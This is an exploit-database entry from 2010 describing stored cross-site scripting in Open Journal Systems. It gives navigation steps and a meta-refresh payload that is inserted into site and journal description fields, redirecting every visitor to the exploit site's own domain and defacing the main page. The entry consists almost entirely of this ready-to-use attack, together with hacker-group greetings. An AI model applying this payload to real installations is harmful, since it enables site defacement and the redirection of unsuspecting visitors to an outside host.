OpenJournalSystem Stored Xss Vulnerability

2010-09-06T00:00:00
ID 1337DAY-ID-13991
Type zdt
Reporter Sweet
Modified 2010-09-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================================
OpenJournalSystem Stored Xss Vulnerability
==========================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                       Sweet the Algerian Haxxor                      0
1                    ######################################            0
0                                                                      1
1  [+]Exploit Title: OpenJournalSystem Stored Xss                      0
0  [+]Date: 5/09/2010                                                  1
1  [+]Author: Sweet                                                    0
0  [+]Contact : [email protected]                                    0
1  [+]Software Link: http://pkp.sfu.ca/?q=ojs                          0
0  [+]Download: http://pkp.sfu.ca/?q=ojs                               1
1  [+]Version: All                                                     0
0  [+]Tested on: WinXp sp3                                             1
1  [+]Risk : Hight                                                     0
0  [+]Description : just another cms                                   0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


An attacker can  deface the main page


---------: Persistant Xss 1 :---------- 

http://www.target.com/path/index.php/index/admin/settings


in Home >  User >  Site Administration >  Site Settings

in introduction 

<meta http-equiv="refresh" content="0; url=http://www.inj3ct0r.com"/>


in About the Site description

<meta http-equiv="refresh" content="0; url=http://www.inj3ct0r.com"/>


in other field put what ever you want > save then visite : http://www.target.com/path/


---------: Persistant Xss 2 :---------- 

Home >  User >  Site Administration >  Journal Settings

in Journal description

<meta http-equiv="refresh" content="0; url=http://www.inj3ct0r.com"/>

in Path put index > save then visite : http://www.target.com/path/


thx to Milw0rm.com , JF - Hamst0r - Keystroke  , inj3ct0r.com , SeeMe


Saha Ftourkoum et 1,2,3 viva L'Algerie :))



#  0day.today [2018-02-15]  #